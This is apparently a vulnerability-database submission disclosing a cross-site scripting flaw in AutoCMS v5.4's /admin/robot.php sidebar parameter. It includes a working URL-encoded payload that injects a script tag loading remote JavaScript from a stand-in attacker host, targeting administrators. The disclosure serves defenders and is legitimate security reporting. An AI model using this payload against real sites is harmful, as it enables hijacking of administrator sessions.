| Title | AutoCMS v5.4 Cross Site Scripting |
|---|---|
| Description | Summary: AutoCMS v5.4 was discovered to contain an XSS vulnerability via the sidebar parameter at /admin/robot.php.<br>Affected Component: /admin/robot.php<br>Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.<br>Payload: `http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E` |
| Source | https://github.com/Hebing123/cve/issues/68 |
| User | jiashenghe (UID 39445) |
| Submission | 13.09.2024 05:22 (2 years ago) |
| Moderation | 14.09.2024 08:43 (1 day later) |
| Status | Accepted |
| VulDB entry | 277503 [AutoCMS 5.4 /admin/robot.php sidebar Cross Site Scripting] |
| Points | 20 |